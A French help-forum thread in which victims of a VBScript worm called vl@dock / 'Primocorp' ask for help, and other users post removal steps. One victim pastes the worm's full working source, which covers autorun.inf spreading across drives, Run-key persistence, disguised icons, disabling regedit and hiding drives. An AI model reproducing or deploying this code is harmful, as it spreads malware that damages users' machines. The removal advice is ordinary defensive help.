Un hacker dans mon système
Nayline
-
bebeflood -
bebeflood -
Bonjour,
mon pc a été infecté par un virus ki s'affiche sous forme de page web: www.primocorp.fb.bz
j'arrive pas à le supprimer . Kan je suis sur msn il balance des messages grossiers à ceux avec ki je chat
je ne sais plus koi faire au démarrage il ya un message ki s'affiche bienvenue sur la primteam site des hackers et blabla
en plus je n'arrive même plus à voir ma partition D:
svp aidez moi c'est urgent.
En référence à cette discussion
mon pc a été infecté par un virus ki s'affiche sous forme de page web: www.primocorp.fb.bz
j'arrive pas à le supprimer . Kan je suis sur msn il balance des messages grossiers à ceux avec ki je chat
je ne sais plus koi faire au démarrage il ya un message ki s'affiche bienvenue sur la primteam site des hackers et blabla
en plus je n'arrive même plus à voir ma partition D:
svp aidez moi c'est urgent.
En référence à cette discussion
A voir également:
- Un hacker dans mon système
- Restauration systeme windows 10 - Guide
- Process hacker - Télécharger - Divers Utilitaires
- Comment refaire le système d'un ordinateur - Guide
- Vous avez besoin d'une autorisation de la part de système pour modifier ce dossier - Guide
- Cette action ne peut pas être réalisée car le fichier est ouvert dans system - Guide
50 réponses
je vous informer que j'ai deja supp vb@dock.vbs mais le lecteur D: ne s'affiche pas !!
et voila le message qui s'affiche au demarrage de la machine
bienvenu a la primteam!!! rejoinez nous vite
slt nous sommes les 1er hacker de côte d'ivoire!!!----si vous voulez nous rejoindre ecrivez nous (faroteur_2006@yahoo.fr)a+++
aidez moi svp
merçi encore
et voila le message qui s'affiche au demarrage de la machine
bienvenu a la primteam!!! rejoinez nous vite
slt nous sommes les 1er hacker de côte d'ivoire!!!----si vous voulez nous rejoindre ecrivez nous (faroteur_2006@yahoo.fr)a+++
aidez moi svp
merçi encore
salut,
je vous informer que j'ai deja supp vb@dock.vbs mais le lecteur D: ne s'affiche pas !!
et voila le message qui s'affiche au demarrage de la machine
bienvenu a la primteam!!! rejoinez nous vite
slt nous sommes les 1er hacker de côte d'ivoire!!!----si vous voulez nous rejoindre ecrivez nous (faroteur_2006@yahoo.fr)a+++
aidez moi svp
merçi encore
je vous informer que j'ai deja supp vb@dock.vbs mais le lecteur D: ne s'affiche pas !!
et voila le message qui s'affiche au demarrage de la machine
bienvenu a la primteam!!! rejoinez nous vite
slt nous sommes les 1er hacker de côte d'ivoire!!!----si vous voulez nous rejoindre ecrivez nous (faroteur_2006@yahoo.fr)a+++
aidez moi svp
merçi encore
Salut; une solution provisoire pour avoir accès au lecteur D est de renommer ce lecteur avec une autre lettre comme M par exemple.
ça ne résoud pas le problème mais au-moins ça permet d'avoir accès au lecteur D
ça ne résoud pas le problème mais au-moins ça permet d'avoir accès au lecteur D
t'inquitte le virus est bien suprimé dans votre ordinateur , pour recuperer la partition , ce lien va t'aidera
http://www.infoprat.net/astuces/windows2k_xp/astuces/bdr_001.php
si cela marche pas , dites le moi , je vais chercher une autre solution
http://www.infoprat.net/astuces/windows2k_xp/astuces/bdr_001.php
si cela marche pas , dites le moi , je vais chercher une autre solution
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
bonjour les mec , merci pour toute vos description .
j'ai tout suivie et presque tout reproduit , et appliqué les moindre de vos conseil.
j'ai telecharger le tuneup (2008) et je suis parti sur le mode sans echec , pu enfin accedée au registre, surpimée le virus (vl@dock.vbs) . lorsque je croyais que il etais parti , je me rends compte qui le disque D n'es toujour pas visible. mais le pire ,c'est que le disque C , (celui ou y a le windows), lorsque j'ai clické desus , il es revenu. j'ai compris que il etait touljour la ( ( en execution automatiq). j''ai refait tout . mais le disque D est toujour sur (excution automatique).
que faire pour le supprimée définitivement!!!!!
autre chose au pire , des amis m'on dis de tout formaté, mais je veux pas perde les donnée du disque D. alors je me suis dis que si je devais tout formaté j'allais gravé mes donnée sur dvd . mais y a un mec qui me dis que le virus , serai dans le dvd et que a chaque fois que je voudrai accedé a mes donnée,il sera la pour me virolée encore et encore !!!!!! ( dois je le croir et renoncée a mes donnée? snifff)?
merci pour tout vos reponse
j'ai tout suivie et presque tout reproduit , et appliqué les moindre de vos conseil.
j'ai telecharger le tuneup (2008) et je suis parti sur le mode sans echec , pu enfin accedée au registre, surpimée le virus (vl@dock.vbs) . lorsque je croyais que il etais parti , je me rends compte qui le disque D n'es toujour pas visible. mais le pire ,c'est que le disque C , (celui ou y a le windows), lorsque j'ai clické desus , il es revenu. j'ai compris que il etait touljour la ( ( en execution automatiq). j''ai refait tout . mais le disque D est toujour sur (excution automatique).
que faire pour le supprimée définitivement!!!!!
autre chose au pire , des amis m'on dis de tout formaté, mais je veux pas perde les donnée du disque D. alors je me suis dis que si je devais tout formaté j'allais gravé mes donnée sur dvd . mais y a un mec qui me dis que le virus , serai dans le dvd et que a chaque fois que je voudrai accedé a mes donnée,il sera la pour me virolée encore et encore !!!!!! ( dois je le croir et renoncée a mes donnée? snifff)?
merci pour tout vos reponse
pour le suprimer définitivement vous devez le suprimer comme j'ai indiqué dans mon dernier message (à l'aide du dos)
pour faire apparaitre votre partition D: , j'ai utiliser partition magic , ce dernier detecte d: aprés j'ai renomer cela en S ou autre letrre qui vs conviendra , comme ca vous allez trouvez la partition S (ds mon cas ) dans votre poste detravail, vous faite la meme chose pour la rendre D: , si vs voulez ( ce que j'ai pas tester)..
NB : pr suprimer définitivement le virus , faut suprimer meme le fivchier vb@dock.vbs ,et autorun.inf s'il existe dans vos partition
pour faire apparaitre votre partition D: , j'ai utiliser partition magic , ce dernier detecte d: aprés j'ai renomer cela en S ou autre letrre qui vs conviendra , comme ca vous allez trouvez la partition S (ds mon cas ) dans votre poste detravail, vous faite la meme chose pour la rendre D: , si vs voulez ( ce que j'ai pas tester)..
NB : pr suprimer définitivement le virus , faut suprimer meme le fivchier vb@dock.vbs ,et autorun.inf s'il existe dans vos partition
c'est vraiment bizard les amis , j'ai passer par la méthode de ten up utilities , et il est supprimer
pour la partition D, voila comment la récupérer:
tapez gpedit.msc dans l'invite de commande
choisir modél d'administration (il ya 2 choisir la 2emme) puis commposant windows puis explorateur windows.
a doite vous trouver des paramétre , choisissez dans poste de travail ,masquer ces lecteur spécifié,
une boitte de dialogue s'affiche, choisir , réstreindre les lecteur A,B,CetD , cliquer sur appliquer , comme ça tous les lecteur vont etre masquer , choisir Ne pas réstreindre les lecteur cliquer sur ok, et comme ça tous vos lecteur vont etre afficher
pour la partition D, voila comment la récupérer:
tapez gpedit.msc dans l'invite de commande
choisir modél d'administration (il ya 2 choisir la 2emme) puis commposant windows puis explorateur windows.
a doite vous trouver des paramétre , choisissez dans poste de travail ,masquer ces lecteur spécifié,
une boitte de dialogue s'affiche, choisir , réstreindre les lecteur A,B,CetD , cliquer sur appliquer , comme ça tous les lecteur vont etre masquer , choisir Ne pas réstreindre les lecteur cliquer sur ok, et comme ça tous vos lecteur vont etre afficher
salut ,
svp aider moi j'ai un gr prob
je ss infecté par un virus ki s'affiche sous forme de page web: www.primocorp.fb.bz
au démarrage de la machine un message ki s'affiche (","BIENVENUE A LA PRIMTEAM!!! REJOIGNEZ NOUS VITE"et (Slt nous sommes les 1er hacker de la Côte d'Ivoire!!!----si vous voulez nous rejoindre ecrivez nous(faroteur_2006@yahoo.fr) a+++ )
en plus je n'arrive même plus à voir ma partition D:(il est cacher)
des jours passe il m'a affiche une autre page sous forme d'un fichier txt; voila qq il contien:
***********************************
' VB Script Document
'Slt les ptits c'est la primteam ki est dans la place
On error resume Next
demarrage = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System"
Dim fso,usb,Textautorun
Set fso = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("Wscript.shell")
Set chemin= FSO.GetSpecialFolder(1)
Textautorun="[autorun]"&vbcrlf&"shellexecute=wscript.exe vl@dock.vbs"&vbcrlf&"action=""pas d'action"""
location=wscript.scriptfullname
do
'lancement de la fonction de copie du virus'
msgcopy chemin, "vl@dock"
starting chemin 'Inscription du virus dans la base de registre pour un demarage automatique'
iconchange 'Execution de la fonction de changement de l'aspect de l'icone des Vbs en Jpeg'
primreg 'execution de la fonction de changement du registre'
Webracourci 'création d'un raccourci web sur le bureau'
'Lancement de la copie du virus et d'autorun sur tout les disques connectés au Pc
for each usb in fso.drives
if(usb.drivetype=1 or usb.drivetype=2)and usb.path <> "A:" then
chemin2=usb.path
msgcopy chemin2, "vl@dock"
set SystemaChem=fso.getfile(chemin2&"\vl@dock.vbs")
SystemaChem.attributes=7
set SystemaChem=fso.getfile(chemin2&"\autorun.inf")
set SystemaChem=fso.createtextfile(chemin2&"\autorun.inf",2,true)
SystemaChem.write Textautorun
SystemaChem.close
set SystemaChem=fso.getfile(chemin2&"\autorun.inf")
SystemaChem.attributes=7
end if
next
loop while time<>"00:00:00"
'--------------------------------------------------------------------------------
'fonction de copie du virus sur le disque et voilage de son existence
sub msgcopy(x,name)
File = Wscript.ScriptFullName
fso.copyfile file ,x & "\" & name & ".vbs"
set SystemaChem=fso.getfile(chemin&"\vl@dock.vbs")
SystemaChem.attributes=7
end sub
'--------------------------------------------------------------------------------'
'fonction d'inscription de valeurs dans le régistre
sub primreg()
Set WshShell = WScript.CreateObject("WScript.Shell")
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.primocorp.fb.bz/","REG_SZ"
'Bloque le changement de la page de démarrage
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\",""
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\",""
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","1","REG_DWORD"
'Interdit l'ouverture de la base de régistre
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
'Affiche mon message de propagande
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Slt c'est ---LIEH@CKER--- le N°1 des hackers ---"
'Affiche le message de raliement
wshshell.regWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption","BIENVENUE A LA PRIMTEAM!!! REJOIGNEZ NOUS VITE"
wshshell.regWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText","Slt nous sommes les 1er hacker de la Côte d'Ivoire!!!----si vous voulez nous rejoindre ecrivez nous(faroteur_2006@yahoo.fr) a+++ "
'Cache les disques dur de la machine
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives","8","REG_DWORD"
end sub
'--------------------------------------------------------------------------------'
'Inscription dans le registre pour une execution au demarage de windows
sub starting(Location)
set wssh = CreateObject("WScript.Shell")
wssh.regwrite demarrage,location & "\vl@dock.vbs"
end sub
'--------------------------------------------------------------------------------'
'Changement de l'icone de Vbs en Jpeg
sub iconchange()
Dim resultat
resultat = wssh.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\")
wssh.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",resultat
end sub
'--------------------------------------------------------------------------------'
'Création d'un raccourci web sur le bureau
sub Webracourci()
Dim Shell, DesktopPath, URL
Set Shell = CreateObject("WScript.Shell")
DesktopPath = Shell.SpecialFolders("Desktop")
Set URL = Shell.CreateShortcut(DesktopPath & "\Primocorp.URL")
URL.TargetPath = "http://www.primocorp.fb.bz"
URL.Save
end sub
'--------------------------------------------------------------------------------
*****************************************
svp aidez moi c'est urgent et merçi d'avance.
svp aider moi j'ai un gr prob
je ss infecté par un virus ki s'affiche sous forme de page web: www.primocorp.fb.bz
au démarrage de la machine un message ki s'affiche (","BIENVENUE A LA PRIMTEAM!!! REJOIGNEZ NOUS VITE"et (Slt nous sommes les 1er hacker de la Côte d'Ivoire!!!----si vous voulez nous rejoindre ecrivez nous(faroteur_2006@yahoo.fr) a+++ )
en plus je n'arrive même plus à voir ma partition D:(il est cacher)
des jours passe il m'a affiche une autre page sous forme d'un fichier txt; voila qq il contien:
***********************************
' VB Script Document
'Slt les ptits c'est la primteam ki est dans la place
On error resume Next
demarrage = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System"
Dim fso,usb,Textautorun
Set fso = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("Wscript.shell")
Set chemin= FSO.GetSpecialFolder(1)
Textautorun="[autorun]"&vbcrlf&"shellexecute=wscript.exe vl@dock.vbs"&vbcrlf&"action=""pas d'action"""
location=wscript.scriptfullname
do
'lancement de la fonction de copie du virus'
msgcopy chemin, "vl@dock"
starting chemin 'Inscription du virus dans la base de registre pour un demarage automatique'
iconchange 'Execution de la fonction de changement de l'aspect de l'icone des Vbs en Jpeg'
primreg 'execution de la fonction de changement du registre'
Webracourci 'création d'un raccourci web sur le bureau'
'Lancement de la copie du virus et d'autorun sur tout les disques connectés au Pc
for each usb in fso.drives
if(usb.drivetype=1 or usb.drivetype=2)and usb.path <> "A:" then
chemin2=usb.path
msgcopy chemin2, "vl@dock"
set SystemaChem=fso.getfile(chemin2&"\vl@dock.vbs")
SystemaChem.attributes=7
set SystemaChem=fso.getfile(chemin2&"\autorun.inf")
set SystemaChem=fso.createtextfile(chemin2&"\autorun.inf",2,true)
SystemaChem.write Textautorun
SystemaChem.close
set SystemaChem=fso.getfile(chemin2&"\autorun.inf")
SystemaChem.attributes=7
end if
next
loop while time<>"00:00:00"
'--------------------------------------------------------------------------------
'fonction de copie du virus sur le disque et voilage de son existence
sub msgcopy(x,name)
File = Wscript.ScriptFullName
fso.copyfile file ,x & "\" & name & ".vbs"
set SystemaChem=fso.getfile(chemin&"\vl@dock.vbs")
SystemaChem.attributes=7
end sub
'--------------------------------------------------------------------------------'
'fonction d'inscription de valeurs dans le régistre
sub primreg()
Set WshShell = WScript.CreateObject("WScript.Shell")
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.primocorp.fb.bz/","REG_SZ"
'Bloque le changement de la page de démarrage
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\",""
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\",""
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","1","REG_DWORD"
'Interdit l'ouverture de la base de régistre
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
'Affiche mon message de propagande
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Slt c'est ---LIEH@CKER--- le N°1 des hackers ---"
'Affiche le message de raliement
wshshell.regWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption","BIENVENUE A LA PRIMTEAM!!! REJOIGNEZ NOUS VITE"
wshshell.regWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText","Slt nous sommes les 1er hacker de la Côte d'Ivoire!!!----si vous voulez nous rejoindre ecrivez nous(faroteur_2006@yahoo.fr) a+++ "
'Cache les disques dur de la machine
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives","8","REG_DWORD"
end sub
'--------------------------------------------------------------------------------'
'Inscription dans le registre pour une execution au demarage de windows
sub starting(Location)
set wssh = CreateObject("WScript.Shell")
wssh.regwrite demarrage,location & "\vl@dock.vbs"
end sub
'--------------------------------------------------------------------------------'
'Changement de l'icone de Vbs en Jpeg
sub iconchange()
Dim resultat
resultat = wssh.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\")
wssh.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",resultat
end sub
'--------------------------------------------------------------------------------'
'Création d'un raccourci web sur le bureau
sub Webracourci()
Dim Shell, DesktopPath, URL
Set Shell = CreateObject("WScript.Shell")
DesktopPath = Shell.SpecialFolders("Desktop")
Set URL = Shell.CreateShortcut(DesktopPath & "\Primocorp.URL")
URL.TargetPath = "http://www.primocorp.fb.bz"
URL.Save
end sub
'--------------------------------------------------------------------------------
*****************************************
svp aidez moi c'est urgent et merçi d'avance.
pour la partition D: tu peu la renommée dans la base de données
tu clique avec la bouton droite sur poste de travail-gérer-gestion des disques- tu clique avec la bouton droite sur la partition D: et renommer la. et tu va la trouvé au poste du travail
et pour la virus utilise avera
tu clique avec la bouton droite sur poste de travail-gérer-gestion des disques- tu clique avec la bouton droite sur la partition D: et renommer la. et tu va la trouvé au poste du travail
et pour la virus utilise avera
veuillez apprendre le code vbs pr s'avoir comment le supp normalement tous et en relation avc la base de registre moi j'ai entrain de créer un anti vl@dock a l'aide de ce fichier lui même
salam al khot voila une solution pour supprimer définitivement ce virus
1ère étape: on vas le Supprimer avec la commande dos
Démarrer ----> exécuter ----> tapez cmd
Cd\
dir /a
del /A/F vl@dock.vbs
del /a/f autorun.inf
pour aller a la partition "d" tapez d:
dir /a
del /a/f vl@dock.vbs
del /a/ autorun.inf
faites la même chose si vous avez d'autre partitions
2eme étape: on vas dans l'éditeur de registre
Démarrer ----> exécuter ----> tapez regedit si vous avez cette commande désactiver par le virus c'est mieux utiliser le logiciel tuneup pour avoir l'accer au registre
Pour supprimer la page qui s'affiche au démarrage de Windows
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Clique droit supprimer LegalNoticeCaption","BIENVENUE A LA PRIMTEAM!!! REJOIGNEZ NOUS VITE"
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Clique droit supprimer LegalNoticeText","Slt nous sommes les 1er hacker de la Côte d'Ivoire!!!----si vous voulez nous rejoindre ecrivez nous(faroteur_2006@yahoo.fr) a+++ "
Pour retablir l'affichage du disque dure disparu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Cliquez droit sur NoDrives modifier et remplacer la valeur 8 par 0
Pour supprimer la page d'accueil www.primocorp.fb.bz
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
Clique droit sur Start Page choisis supprimer
Clique droit sur window title choisis supprimer
Pour activer l'ouverture de la base de registre
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\
Clique droit sur DisableR¬egistry choisis modifier remplacer la valeur 1 par 0
Redémarrer votre pc et tout vas bien marché
1ère étape: on vas le Supprimer avec la commande dos
Démarrer ----> exécuter ----> tapez cmd
Cd\
dir /a
del /A/F vl@dock.vbs
del /a/f autorun.inf
pour aller a la partition "d" tapez d:
dir /a
del /a/f vl@dock.vbs
del /a/ autorun.inf
faites la même chose si vous avez d'autre partitions
2eme étape: on vas dans l'éditeur de registre
Démarrer ----> exécuter ----> tapez regedit si vous avez cette commande désactiver par le virus c'est mieux utiliser le logiciel tuneup pour avoir l'accer au registre
Pour supprimer la page qui s'affiche au démarrage de Windows
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Clique droit supprimer LegalNoticeCaption","BIENVENUE A LA PRIMTEAM!!! REJOIGNEZ NOUS VITE"
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Clique droit supprimer LegalNoticeText","Slt nous sommes les 1er hacker de la Côte d'Ivoire!!!----si vous voulez nous rejoindre ecrivez nous(faroteur_2006@yahoo.fr) a+++ "
Pour retablir l'affichage du disque dure disparu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Cliquez droit sur NoDrives modifier et remplacer la valeur 8 par 0
Pour supprimer la page d'accueil www.primocorp.fb.bz
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
Clique droit sur Start Page choisis supprimer
Clique droit sur window title choisis supprimer
Pour activer l'ouverture de la base de registre
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\
Clique droit sur DisableR¬egistry choisis modifier remplacer la valeur 1 par 0
Redémarrer votre pc et tout vas bien marché
le problème, mes amis, c'est que ce truc (virus ou trojan soit-il, peu importe) est un script vbs (vb script) qui utilise un programme en faille de windows comme environnement pour s'exécuter, le programme en question est: (wscript.exe)
que vous trouverez en tapant ("%systemroot%system32") dans le champs de la fenêtre exécuter (accédée a partir du menu demarrer)
don c ce qu'il faut, c'est d'essayer de briser l'association des scripts .vbs avec ce wscript(wsh pour les habitués)
pour cela vous allez dans poste de travail -> outils-> options de dossiers->(l'onglet) types de fichiers -> (tapez v puis défiler la barre pour tomber sur vbs, en face de lui vous verrez le programme qui lui associé pour l'execution (ca sera ce wsh), vous essayez de supprimer la liaison (bouton supprimer en dessous), sinon si ce n'est pas possible (travail du virus)
essayer de modifier en un autre programme, moi je l'ai lié avec bloc notes :)
allez amusez vous, et ne chater plus c'est une perte de temps :!
enfin comme a dit l'autre, les marocains sont forts hehaa @+ ((des soucis, questionner moi??!!))
que vous trouverez en tapant ("%systemroot%system32") dans le champs de la fenêtre exécuter (accédée a partir du menu demarrer)
don c ce qu'il faut, c'est d'essayer de briser l'association des scripts .vbs avec ce wscript(wsh pour les habitués)
pour cela vous allez dans poste de travail -> outils-> options de dossiers->(l'onglet) types de fichiers -> (tapez v puis défiler la barre pour tomber sur vbs, en face de lui vous verrez le programme qui lui associé pour l'execution (ca sera ce wsh), vous essayez de supprimer la liaison (bouton supprimer en dessous), sinon si ce n'est pas possible (travail du virus)
essayer de modifier en un autre programme, moi je l'ai lié avec bloc notes :)
allez amusez vous, et ne chater plus c'est une perte de temps :!
enfin comme a dit l'autre, les marocains sont forts hehaa @+ ((des soucis, questionner moi??!!))
bonsoir
avant tout je tiens à vous remercier pour ce forum qui nous aide énormément, puis je tiens à signaler que le virus dont vous parler n'est pas assez simple à supprimer , je parle en connaissance de cause puisque j'avais le même probléme (et je l'ai toujours ) , j'ai pu activer la modification du registre grace à (restoreregedit ) aprés avoir installer 3 logiciels qui n'ont rien fait , et j'ai pu supprimé les fichiers infectés dans la base du registre ,aprés j'ai lancé la recherche dans mes deux répartitions pour détecter le virus , et oui j'ai pu le faire mais j'ai pas pu le supprimer , et puis et sans faire attention j'ai cliquer sur le lecteur C , et l'action du virus s'est déclanchée à nouveau .... et j'ai pas pu activer à nouveau la modification du registre ,donc là chui coincé je peux rien faire s'il y a une solution efficace je serai tres reconnaissant
NB.j'ai essayé toutes les solutions présentées dans le forum
avant tout je tiens à vous remercier pour ce forum qui nous aide énormément, puis je tiens à signaler que le virus dont vous parler n'est pas assez simple à supprimer , je parle en connaissance de cause puisque j'avais le même probléme (et je l'ai toujours ) , j'ai pu activer la modification du registre grace à (restoreregedit ) aprés avoir installer 3 logiciels qui n'ont rien fait , et j'ai pu supprimé les fichiers infectés dans la base du registre ,aprés j'ai lancé la recherche dans mes deux répartitions pour détecter le virus , et oui j'ai pu le faire mais j'ai pas pu le supprimer , et puis et sans faire attention j'ai cliquer sur le lecteur C , et l'action du virus s'est déclanchée à nouveau .... et j'ai pas pu activer à nouveau la modification du registre ,donc là chui coincé je peux rien faire s'il y a une solution efficace je serai tres reconnaissant
NB.j'ai essayé toutes les solutions présentées dans le forum
Demarrer
Executer
taper "regedit"
tu va dans
hkey_current_user
software
microsoft
windows
currentversion
run
Tu regardes si tu ne vois pas une clé qui ressemble à ton fichier primocorp.
Et tu le supprime a partir de la.
Puis tu fait la meme chose dans hkey_local_machine
****************msrs_hicham************
Executer
taper "regedit"
tu va dans
hkey_current_user
software
microsoft
windows
currentversion
run
Tu regardes si tu ne vois pas une clé qui ressemble à ton fichier primocorp.
Et tu le supprime a partir de la.
Puis tu fait la meme chose dans hkey_local_machine
****************msrs_hicham************
slt
j'etais attaqué par le meme virus, et je viens de suivre cette procedure de desinfection
mon probleme est resolu
http://blog.abuse.ma/?p=69
j'etais attaqué par le meme virus, et je viens de suivre cette procedure de desinfection
mon probleme est resolu
http://blog.abuse.ma/?p=69
bonjour
merci pour le lien
et je precise:
http://blog.abuse.ma/dockfix.exe
fini 'Primocorp' et la disparition de mes partitions
thanx
merci pour le lien
et je precise:
http://blog.abuse.ma/dockfix.exe
fini 'Primocorp' et la disparition de mes partitions
thanx
LA SOLITON présentée par "loboking" est la plus complète possible .
vous allez l'effacer complètement en l'appliquant à la lettre .
vous allez l'effacer complètement en l'appliquant à la lettre .
